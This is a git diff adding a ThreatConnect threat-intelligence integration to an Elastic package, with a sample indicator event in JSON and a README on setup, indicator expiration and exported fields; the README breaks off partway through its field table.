00000000000..1401563c952 --- /dev/null +++ b/packages/ti_threatconnect/data_stream/indicator/sample_event.json @@ -0,0 +1,265 @@ +{ + "@timestamp": "2023-12-05T06:38:53.000Z", + "agent": { + "ephemeral_id": "6dfff0ee-3e69-419f-941e-9b8b053ed0a5", + "id": "69df163b-6251-4779-af90-125b908727c2", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.0" + }, + "data_stream": { + "dataset": "ti_threatconnect.indicator", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "69df163b-6251-4779-af90-125b908727c2", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "dataset": "ti_threatconnect.indicator", + "id": "test.user@elastic.co", + "ingested": "2024-03-08T06:55:44Z", + "kind": "enrichment", + "original": "{\"active\":true,\"activeLocked\":false,\"address\":\"test.user@elastic.co\",\"associatedGroups\":{\"data\":[{\"createdBy\":{\"firstName\":\"test\",\"id\":69,\"lastName\":\"user\",\"owner\":\"Elastic\",\"pseudonym\":\"testW\",\"userName\":\"test.user@elastic.co\"},\"dateAdded\":\"2023-12-05T06:38:33Z\",\"downVoteCount\":\"0\",\"id\":609427,\"lastModified\":\"2023-12-05T06:43:21Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427\",\"name\":\"Test2 \",\"ownerId\":51,\"ownerName\":\"Elastic\",\"type\":\"Vulnerability\",\"upVoteCount\":\"0\",\"webLink\":\"https://app.threatconnect.com/#/details/groups/609427/overview\"},{\"createdBy\":{\"firstName\":\"test\",\"id\":69,\"lastName\":\"user\",\"owner\":\"Elastic\",\"pseudonym\":\"testW\",\"userName\":\"test.user@elastic.co\"},\"dateAdded\":\"2023-12-04T07:18:52Z\",\"documentDateAdded\":\"2023-12-04T07:18:53Z\",\"documentType\":\"PDF\",\"downVoteCount\":\"0\",\"fileName\":\"testthreatgroup.pdf\",\"fileSize\":24467,\"generatedReport\":true,\"id\":601237,\"lastModified\":\"2023-12-05T06:38:46Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/report/report.xhtml?report=601237\",\"name\":\"TestThreatGroup\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"status\":\"Success\",\"type\":\"Report\",\"upVoteCount\":\"0\",\"webLink\":\"https://app.threatconnect.com/#/details/groups/601237/overview\"}]},\"associatedIndicators\":{\"data\":[{\"active\":true,\"activeLocked\":false,\"address\":\"testing@poverts.com\",\"confidence\":61,\"dateAdded\":\"2023-08-25T12:57:24Z\",\"id\":891599,\"lastModified\":\"2023-12-05T06:50:06Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"rating\":3,\"summary\":\"testing@poverts.com\",\"type\":\"EmailAddress\",\"webLink\":\"https://app.threatconnect.com/#/details/indicators/891599/overview\"},{\"active\":true,\"activeLocked\":false,\"dateAdded\":\"2023-08-24T06:28:17Z\",\"id\":738667,\"lastModified\":\"2023-12-05T06:47:59Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"summary\":\"http://www.testingmcafeesites.com/testcat_pc.html\",\"text\":\"http://www.testingmcafeesites.com/testcat_pc.html\",\"type\":\"URL\",\"webLink\":\"https://app.threatconnect.com/#/details/indicators/738667/overview\"}]},\"attributes\":{},\"dateAdded\":\"2023-08-24T06:19:58Z\",\"id\":736758,\"lastModified\":\"2023-12-05T06:38:53Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"securityLabels\":{\"data\":[{\"color\":\"FFC000\",\"dateAdded\":\"2016-08-31T00:00:00Z\",\"description\":\"This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.\",\"id\":3,\"name\":\"TLP:AMBER\",\"owner\":\"System\"}]},\"summary\":\"test.user@elastic.co\",\"tags\":{\"data\":[{\"description\":\"Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \\\"pig butchering,\\\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \\n\\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\\n\\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\\n\\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)\",\"id\":463701,\"lastUsed\":\"2023-12-04T06:44:44Z\",\"name\":\"Financial Theft\",\"platforms\":{\"count\":6,\"data\":[\"Linux\",\"macOS\",\"Windows\",\"Office 365\",\"SaaS\",\"Google Workspace\"]},\"techniqueId\":\"T1657\"}]},\"threatAssessConfidence\":0,\"threatAssessRating\":0,\"threatAssessScore\":281,\"threatAssessScoreFalsePositive\":0,\"threatAssessScoreObserved\":0,\"type\":\"EmailAddress\",\"webLink\":\"https://app.threatconnect.com/#/details/indicators/736758/overview\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "cel" + }, + "os": { + "family": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ] + }, + "related": { + "user": [ + "test.user", + "test", + "user", + "test.user@elastic.co" + ] + }, + "tags": [ + "preserve_original_event", + "forwarded", + "threatconnect-indicator" + ], + "threat": { + "indicator": { + "email": { + "address": "test.user@elastic.co" + }, + "marking": { + "tlp": [ + "AMBER" + ] + }, + "provider": "ThreatConnect", + "reference": [ + "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic", + "https://app.threatconnect.com/#/details/indicators/736758/overview" + ], + "type": [ + "email-addr" + ] + }, + "technique": { + "id": [ + "T1657" + ] + } + }, + "threat_connect": { + "indicator": { + "active": { + "locked": false, + "value": true + }, + "address": "test.user@elastic.co", + "associated_groups": { + "data": [ + { + "created_by": { + "first_name": "test", + "id": "69", + "last_name": "user", + "owner": "Elastic", + "pseudonym": "testW", + "user_name": "test.user@elastic.co" + }, + "date_added": "2023-12-05T06:38:33.000Z", + "down_vote_count": "0", + "id": "609427", + "last_modified": "2023-12-05T06:43:21.000Z", + "legacy_link": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427", + "name": "Test2 ", + "owner": { + "id": "51", + "name": "Elastic" + }, + "type": "Vulnerability", + "up_vote_count": "0", + "web_link": "https://app.threatconnect.com/#/details/groups/609427/overview" + }, + { + "created_by": { + "first_name": "test", + "id": "69", + "last_name": "user", + "owner": "Elastic", + "pseudonym": "testW", + "user_name": "test.user@elastic.co" + }, + "date_added": "2023-12-04T07:18:52.000Z", + "document": { + "date_added": "2023-12-04T07:18:53.000Z", + "type": "PDF" + }, + "down_vote_count": "0", + "file": { + "name": "testthreatgroup.pdf", + "size": "24467" + }, + "generated_report": true, + "id": "601237", + "last_modified": "2023-12-05T06:38:46.000Z", + "legacy_link": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237", + "name": "TestThreatGroup", + "owner": { + "id": "51", + "name": "Elastic" + }, + "status": "Success", + "type": "Report", + "up_vote_count": "0", + "web_link": "https://app.threatconnect.com/#/details/groups/601237/overview" + } + ] + }, + "associated_indicators": { + "data": [ + { + "active": { + "locked": false, + "value": true + }, + "address": "testing@poverts.com", + "confidence": 61, + "date_added": "2023-08-25T12:57:24.000Z", + "id": "891599", + "last_modified": "2023-12-05T06:50:06.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic", + "owner": { + "id": "51", + "name": "Elastic" + }, + "private_flag": false, + "rating": 3, + "summary": "testing@poverts.com", + "type": "EmailAddress", + "web_link": "https://app.threatconnect.com/#/details/indicators/891599/overview" + }, + { + "active": { + "locked": false, + "value": true + }, + "date_added": "2023-08-24T06:28:17.000Z", + "id": "738667", + "last_modified": "2023-12-05T06:47:59.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic", + "owner": { + "id": "51", + "name": "Elastic" + }, + "private_flag": false, + "summary": "http://www.testingmcafeesites.com/testcat_pc.html", + "text": "http://www.testingmcafeesites.com/testcat_pc.html", + "type": "URL", + "web_link": "https://app.threatconnect.com/#/details/indicators/738667/overview" + } + ] + }, + "date_added": "2023-08-24T06:19:58.000Z", + "deleted_at": "2024-03-04T06:38:53.000Z", + "expiration_duration": "90d", + "id": "736758", + "last_modified": "2023-12-05T06:38:53.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic", + "owner": { + "id": "51", + "name": "Elastic" + }, + "private_flag": false, + "security_labels": { + "data": [ + { + "color": "FFC000", + "date_added": "2016-08-31T00:00:00.000Z", + "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.", + "id": "3", + "name": "TLP:AMBER", + "owner": "System" + } + ] + }, + "summary": "test.user@elastic.co", + "tags": { + "data": [ + { + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "id": "463701", + "last_used": "2023-12-04T06:44:44.000Z", + "name": "Financial Theft", + "platforms": { + "count": 6, + "data": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ] + }, + "technique": { + "id": "T1657" + } + } + ] + }, + "threat_assess": { + "confidence": 0, + "rating": 0, + "score": { + "false_positive": 0, + "observed": 0, + "value": 281 + } + }, + "type": "EmailAddress", + "web_link": "https://app.threatconnect.com/#/details/indicators/736758/overview" + } + }, + "user": { + "domain": "elastic.co", + "email": "test.user@elastic.co", + "name": "test.user" + } +} \ No newline at end of file diff --git a/packages/ti_threatconnect/docs/README.md b/packages/ti_threatconnect/docs/README.md new file mode 100644 index 00000000000..72552f9a39e --- /dev/null +++ b/packages/ti_threatconnect/docs/README.md @@ -0,0 +1,545 @@ +# ThreatConnect + +ThreatConnect is a widely used Threat Intelligence Platform (TIP) designed to assist organizations in aggregating, analyzing, and sharing information related to cybersecurity threats. The platform provides tools and features that enable security teams to collaborate on threat intelligence, manage incidents, and make informed decisions to enhance their overall cybersecurity posture. This ThreatConnect integration enables you to consume and analyze ThreatConnect data within Elastic Security, including indicator events, providing you with visibility and context for your cloud environments within Elastic Security. + +## Data streams + +The ThreatConnect integration collects a single type of data: Indicator. + +**Indicator** is used to retrieve atomic piece of information that has some intelligence value via the [ThreatConnect](https://docs.threatconnect.com/en/latest/rest_api/v3/indicators/indicators.html) + +Reference for [REST APIs](https://docs.threatconnect.com/en/latest/rest_api/rest_api.html#getting-started) of ThreatConnect. + +## Requirements + +Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **kibana.version** required is **8.11.0**. +This module has been tested against the **ThreatConnect API Version v3**. +The minimum required ThreatConnect Platform version needs to be **7.3.1**. + +## Setup + +### To collect data from ThreatConnect, the following parameters from your ThreatConnect instance are required: + +1. Access Id +2. Secret Key +3. URL + +To create an API user account, please refer to [this](https://knowledge.threatconnect.com/docs/creating-user-accounts) article. + +### Enabling the integration in Elastic: +1. In Kibana, go to Management > Integrations. +2. In the "Search for integrations" search bar, type ThreatConnect. +3. Click on the "ThreatConnect" integration from the search results. +4. Click on the "Add ThreatConnect" button to add the integration. +5. Configure all required integration parameters, including Access Id, Secret Key, and URL, to enable data collection from the ThreatConnect REST API. +6. Save the integration. + +## Indicators Expiration + +The ingested indicators expire after certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to faciliate only active indicators be available to the end users. Since we want to retain only valuable information and avoid duplicated data, the ThreatConnect Elastic integration forces the intel indicators to rotate into a custom index called: `logs-ti_threatconnect_latest.dest_indicator-*`. +**Please, refer to this index in order to set alerts and so on.** + +#### Handling Orphaned Indicators + +Some ThreatConnect indicators may never expire and will continue to stay in the latest destination index. To avoid any false positives from such orphaned indicators, users are allowed to configure `IOC Expiration Duration` parameter while setting up the integration. This parameter deletes all data inside the destination index `logs-ti_threatconnect_latest.dest_indicator` after this specified duration is reached. Users must pull entire feed instead of incremental feed when this expiration happens so that the indicators get reset. + +### How it works + +This is possible thanks to a transform rule installed along with the integration. The transform rule parses the data stream content that is pulled from ThreatConnect and only adds new indicators. + +Both the data stream and the latest index have applied expiration through ILM and a retention policy in the transform respectively. + +## Logs Reference + +### Indicator + +This is the `Indicator` dataset. + +#### Example + +An example event for `indicator` looks as following: + +```json +{ + "@timestamp": "2023-12-05T06:38:53.000Z", + "agent": { + "ephemeral_id": "6dfff0ee-3e69-419f-941e-9b8b053ed0a5", + "id": "69df163b-6251-4779-af90-125b908727c2", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.0" + }, + "data_stream": { + "dataset": "ti_threatconnect.indicator", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "69df163b-6251-4779-af90-125b908727c2", + "snapshot": false, + "version": "8.12.0" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "dataset": "ti_threatconnect.indicator", + "id": "test.user@elastic.co", + "ingested": "2024-03-08T06:55:44Z", + "kind": "enrichment", + "original": "{\"active\":true,\"activeLocked\":false,\"address\":\"test.user@elastic.co\",\"associatedGroups\":{\"data\":[{\"createdBy\":{\"firstName\":\"test\",\"id\":69,\"lastName\":\"user\",\"owner\":\"Elastic\",\"pseudonym\":\"testW\",\"userName\":\"test.user@elastic.co\"},\"dateAdded\":\"2023-12-05T06:38:33Z\",\"downVoteCount\":\"0\",\"id\":609427,\"lastModified\":\"2023-12-05T06:43:21Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427\",\"name\":\"Test2 \",\"ownerId\":51,\"ownerName\":\"Elastic\",\"type\":\"Vulnerability\",\"upVoteCount\":\"0\",\"webLink\":\"https://app.threatconnect.com/#/details/groups/609427/overview\"},{\"createdBy\":{\"firstName\":\"test\",\"id\":69,\"lastName\":\"user\",\"owner\":\"Elastic\",\"pseudonym\":\"testW\",\"userName\":\"test.user@elastic.co\"},\"dateAdded\":\"2023-12-04T07:18:52Z\",\"documentDateAdded\":\"2023-12-04T07:18:53Z\",\"documentType\":\"PDF\",\"downVoteCount\":\"0\",\"fileName\":\"testthreatgroup.pdf\",\"fileSize\":24467,\"generatedReport\":true,\"id\":601237,\"lastModified\":\"2023-12-05T06:38:46Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/report/report.xhtml?report=601237\",\"name\":\"TestThreatGroup\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"status\":\"Success\",\"type\":\"Report\",\"upVoteCount\":\"0\",\"webLink\":\"https://app.threatconnect.com/#/details/groups/601237/overview\"}]},\"associatedIndicators\":{\"data\":[{\"active\":true,\"activeLocked\":false,\"address\":\"testing@poverts.com\",\"confidence\":61,\"dateAdded\":\"2023-08-25T12:57:24Z\",\"id\":891599,\"lastModified\":\"2023-12-05T06:50:06Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"rating\":3,\"summary\":\"testing@poverts.com\",\"type\":\"EmailAddress\",\"webLink\":\"https://app.threatconnect.com/#/details/indicators/891599/overview\"},{\"active\":true,\"activeLocked\":false,\"dateAdded\":\"2023-08-24T06:28:17Z\",\"id\":738667,\"lastModified\":\"2023-12-05T06:47:59Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"summary\":\"http://www.testingmcafeesites.com/testcat_pc.html\",\"text\":\"http://www.testingmcafeesites.com/testcat_pc.html\",\"type\":\"URL\",\"webLink\":\"https://app.threatconnect.com/#/details/indicators/738667/overview\"}]},\"attributes\":{},\"dateAdded\":\"2023-08-24T06:19:58Z\",\"id\":736758,\"lastModified\":\"2023-12-05T06:38:53Z\",\"legacyLink\":\"https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co\\u0026owner=Elastic\",\"ownerId\":51,\"ownerName\":\"Elastic\",\"privateFlag\":false,\"securityLabels\":{\"data\":[{\"color\":\"FFC000\",\"dateAdded\":\"2016-08-31T00:00:00Z\",\"description\":\"This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.\",\"id\":3,\"name\":\"TLP:AMBER\",\"owner\":\"System\"}]},\"summary\":\"test.user@elastic.co\",\"tags\":{\"data\":[{\"description\":\"Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \\\"pig butchering,\\\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \\n\\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\\n\\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\\n\\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)\",\"id\":463701,\"lastUsed\":\"2023-12-04T06:44:44Z\",\"name\":\"Financial Theft\",\"platforms\":{\"count\":6,\"data\":[\"Linux\",\"macOS\",\"Windows\",\"Office 365\",\"SaaS\",\"Google Workspace\"]},\"techniqueId\":\"T1657\"}]},\"threatAssessConfidence\":0,\"threatAssessRating\":0,\"threatAssessScore\":281,\"threatAssessScoreFalsePositive\":0,\"threatAssessScoreObserved\":0,\"type\":\"EmailAddress\",\"webLink\":\"https://app.threatconnect.com/#/details/indicators/736758/overview\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "cel" + }, + "os": { + "family": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ] + }, + "related": { + "user": [ + "test.user", + "test", + "user", + "test.user@elastic.co" + ] + }, + "tags": [ + "preserve_original_event", + "forwarded", + "threatconnect-indicator" + ], + "threat": { + "indicator": { + "email": { + "address": "test.user@elastic.co" + }, + "marking": { + "tlp": [ + "AMBER" + ] + }, + "provider": "ThreatConnect", + "reference": [ + "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic", + "https://app.threatconnect.com/#/details/indicators/736758/overview" + ], + "type": [ + "email-addr" + ] + }, + "technique": { + "id": [ + "T1657" + ] + } + }, + "threat_connect": { + "indicator": { + "active": { + "locked": false, + "value": true + }, + "address": "test.user@elastic.co", + "associated_groups": { + "data": [ + { + "created_by": { + "first_name": "test", + "id": "69", + "last_name": "user", + "owner": "Elastic", + "pseudonym": "testW", + "user_name": "test.user@elastic.co" + }, + "date_added": "2023-12-05T06:38:33.000Z", + "down_vote_count": "0", + "id": "609427", + "last_modified": "2023-12-05T06:43:21.000Z", + "legacy_link": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427", + "name": "Test2 ", + "owner": { + "id": "51", + "name": "Elastic" + }, + "type": "Vulnerability", + "up_vote_count": "0", + "web_link": "https://app.threatconnect.com/#/details/groups/609427/overview" + }, + { + "created_by": { + "first_name": "test", + "id": "69", + "last_name": "user", + "owner": "Elastic", + "pseudonym": "testW", + "user_name": "test.user@elastic.co" + }, + "date_added": "2023-12-04T07:18:52.000Z", + "document": { + "date_added": "2023-12-04T07:18:53.000Z", + "type": "PDF" + }, + "down_vote_count": "0", + "file": { + "name": "testthreatgroup.pdf", + "size": "24467" + }, + "generated_report": true, + "id": "601237", + "last_modified": "2023-12-05T06:38:46.000Z", + "legacy_link": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237", + "name": "TestThreatGroup", + "owner": { + "id": "51", + "name": "Elastic" + }, + "status": "Success", + "type": "Report", + "up_vote_count": "0", + "web_link": "https://app.threatconnect.com/#/details/groups/601237/overview" + } + ] + }, + "associated_indicators": { + "data": [ + { + "active": { + "locked": false, + "value": true + }, + "address": "testing@poverts.com", + "confidence": 61, + "date_added": "2023-08-25T12:57:24.000Z", + "id": "891599", + "last_modified": "2023-12-05T06:50:06.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic", + "owner": { + "id": "51", + "name": "Elastic" + }, + "private_flag": false, + "rating": 3, + "summary": "testing@poverts.com", + "type": "EmailAddress", + "web_link": "https://app.threatconnect.com/#/details/indicators/891599/overview" + }, + { + "active": { + "locked": false, + "value": true + }, + "date_added": "2023-08-24T06:28:17.000Z", + "id": "738667", + "last_modified": "2023-12-05T06:47:59.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic", + "owner": { + "id": "51", + "name": "Elastic" + }, + "private_flag": false, + "summary": "http://www.testingmcafeesites.com/testcat_pc.html", + "text": "http://www.testingmcafeesites.com/testcat_pc.html", + "type": "URL", + "web_link": "https://app.threatconnect.com/#/details/indicators/738667/overview" + } + ] + }, + "date_added": "2023-08-24T06:19:58.000Z", + "deleted_at": "2024-03-04T06:38:53.000Z", + "expiration_duration": "90d", + "id": "736758", + "last_modified": "2023-12-05T06:38:53.000Z", + "legacy_link": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic", + "owner": { + "id": "51", + "name": "Elastic" + }, + "private_flag": false, + "security_labels": { + "data": [ + { + "color": "FFC000", + "date_added": "2016-08-31T00:00:00.000Z", + "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.", + "id": "3", + "name": "TLP:AMBER", + "owner": "System" + } + ] + }, + "summary": "test.user@elastic.co", + "tags": { + "data": [ + { + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "id": "463701", + "last_used": "2023-12-04T06:44:44.000Z", + "name": "Financial Theft", + "platforms": { + "count": 6, + "data": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ] + }, + "technique": { + "id": "T1657" + } + } + ] + }, + "threat_assess": { + "confidence": 0, + "rating": 0, + "score": { + "false_positive": 0, + "observed": 0, + "value": 281 + } + }, + "type": "EmailAddress", + "web_link": "https://app.threatconnect.com/#/details/indicators/736758/overview" + } + }, + "user": { + "domain": "elastic.co", + "email": "test.user@elastic.co", + "name": "test.user" + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| event.dataset | Event dataset. | constant_keyword | +| event.module | Event module. | constant_keyword | +| input.type | Type of filebeat input. | keyword | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | +| log.offset | Log offset. | long | +| tags | User defined tags. | keyword | +| threat.feed.name | Display friendly feed name. | constant_keyword | +| threat_connect.indicator.active.locked | Indicates whether the active status is locked. | boolean | +| threat_connect.indicator.active.value | Indicates whether the indicator is active. | boolean | +| threat_connect.indicator.address | The email address associated with the Email Address Indicator. | keyword | +| threat_connect.indicator.as_number | The AS number associated with the ASN Indicator. | keyword | +| threat_connect.indicator.associated_artifacts | A list of Artifacts associated to the Indicator. | flattened | +| threat_connect.indicator.associated_cases | A list of Cases associated to the Indicator. | flattened | +| threat_connect.indicator.associated_groups.data.assignments.data.type | Valid values for the type of assignment are Assigned and Escalate. | keyword | +| threat_connect.indicator.associated_groups.data.assignments.data.user.id | Unique identifier of users assigned to the Task or to whom the Task will be escalated. | keyword | 